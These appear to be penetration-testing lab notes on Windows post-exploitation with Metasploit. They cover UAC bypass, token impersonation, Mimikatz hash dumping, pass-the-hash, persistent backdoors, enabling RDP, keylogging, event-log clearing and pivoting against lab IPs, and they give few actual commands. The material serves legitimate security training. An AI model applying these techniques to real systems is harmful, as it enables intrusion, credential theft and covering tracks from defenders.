🔬Win Post Exploitation - MSF

Lab 1 - HTTP/HFS

🔬 Same HFS Exploitation lab

• Target IP: 10.2.16.114

• Metasploit post/multi/manage/shell_to_meterpreter module

service postgresql start && msfconsole -q

db_status
setg RHOSTS 10.2.16.114
setg RHOST 10.2.16.114
workspace -a Windows_PostExp

• Perform an nmap scan directly into MSF

db_nmap -sV 10.2.16.114

80/tcp    open  http 		 HttpFileServer httpd 2.3
135/tcp   open  msrpc		 Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc 		 Microsoft Windows RPC
49153/tcp open  msrpc		 Microsoft Windows RPC
49154/tcp open  msrpc		 Microsoft Windows RPC
49155/tcp open  msrpc		 Microsoft Windows RPC
49165/tcp open  msrpc		 Microsoft Windows RPC

• In the new Meterpreter session, enumerate the Windows target

Some commands

Some Post Exploitation

• Architecture migrate

• Migration e.g. from x86 service

• Enumerate current user privileges

• Check current and recently logged on users

• Determine if the system is a VM

• Enumerate installed programs

📌 Applications version is a very useful information. It can lead to a privilege escalation vulnerability!

• The /root/.msf4/loot/ folder can be handy.

• Check Antivirus

• Enumerate domain computers

• Enumerate installed patches

• Enumerate any shares

• Check if RDP is enabled

Lab 2 - UAC Bypass

🔬 UAC Bypass: Memory Injection (Metasploit)

• Target IP: 10.2.18.116

• Metasploit Windows Escalate UAC Protection Bypass (In Memory Injection) module

  • This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

• Perform an nmap scan directly into MSF

Exploitation / Meterpreter x64

Privilege Escalation

• On the Windows target cmd

Bypass UAC

• Select the correct target - x64

• Now the getsystem command should work

Hashes Dump

Lab 3 - Token Impersonation

🔬 Privilege Escalation: Impersonate

• Target IP: 10.2.16.163

• Check the 🔬Access Token lab here that already covered the Incognito tool

• Metasploit Token Impersonation with Incognito inbuilt Meterpreter module

• Access Token Impersonation - Description

Exploitation / Meterpreter x64

Privilege Escalation

Incognito

• ATTACKDEFENSE\Administrator account access token would provide elevated privileges

Lab 4 - Dump Hashes Mimikatz

🔬 Windows: Meterpreter: Kiwi Extension

• Target IP: 10.2.17.39

• Check the 🔬Lab 2 - Mimikatz lab here with full description of the commands

Exploitation

Hash Dumping - Kiwi

Hash Dumping - Mimikatz.exe

• Run mimikatz.exe

• Dump the cache of the lsass process

Lab 5 - Pass-the-Hash with PsExec

🔬 Windows: Meterpreter: Kiwi Extension - same lab as Lab 4

• Target IP: 10.2.28.123

• Check the 🔬Lab 3 - Pass-the-hash lab here for full description

• Metasploit PsExec module

Exploitation

Privilege Escalation

Pass-the-hash - PSExec

• Use PSExec to login with Administrator user and its password hashes

Lab 6 - Persistence

🔬 Maintaining Access: Persistence Service

• Target IP: 10.2.20.185

• Metasploit persistence modules

Exploitation

Persistence

❗ In order to set up persistence, administrative privileges are required.

• Successful maintained access. Once the persistent backdoor is installed, it's going to continue to run (across restarts) as a service and a multi handler listening to a connection will receive a connection from the service.

• Regain access to the system

Lab 7 - Enabling RDP

🔬 Windows: Enabling Remote Desktop

• Target IP: 10.2.21.205

• Enable RDP on the target machine on port 3389

Exploitation

Enable RDP

• To access RDP, login credentials are necessary

• Change the Administrator user's password (no recommended in a real-world system)

📌 During a standard Pentest, create another user account, add it to the Administrators group and utilize that one.

Legitimate credentials are now: administrator:p4ssword_12344321

• In a new Terminal TAB

Lab 8 - Keylogging

🔬 Windows: File and Keylogging

• Target IP: 10.2.24.165

• Metasploit keystroke sniffer

Exploitation

Keylogging

• Open a Notepad session on the Target machine.

• On the Attacker machine, start the keystroke capture

• Input some text into the target machine

• Back on the attacker machine, capture the entered data

• Stop the sniffer

Lab 9 - Clearing Event Logs

🔬 Same as Lab 8 - Windows: File and Keylogging

• Target IP: 10.2.26.66

• Metasploit clearev Meterpreter option

Exploitation

Clearing Windows Event Logs

❗ Elevated privileges are necessary to clean the Event logs.

• From the Meterpreter session clear the event log

📌 Exploit files or executables need to be cleaned too.

Lab 10 - Pivoting

🔬 Pivoting

• Target 1 IP: 10.2.30.252

• Target 2 IP: 10.2.21.166

• Pivoting technique with a network route to the internal network's subnet

Exploitation

• Target2 is on the same Target1 subnet - 10.2.16.0/20 (look at the Interface 12)

  • 10.2.16.0/20 = from 10.2.16.1 to 10.2.31.254

Pivoting

• From the attacker's machine, a route through "target1 10.2.30.0/20 machine" is needed, to run MSF modules against target2 machine

• Now, subnet 10.2.30.0/20 can be accessed with MSFconsole

• Scan for open ports on the target2 system - 10.2.21.166

• 📌 The route is only applicable to MSFconsole, not outside of it

Port Forwarding

• To perform an nmap scan on target2, a port forwarding need to be set up.

  • e.g. forward the remote port 80 to an attacker machine local port, which will allow to perform a service version enumeration of the target2 service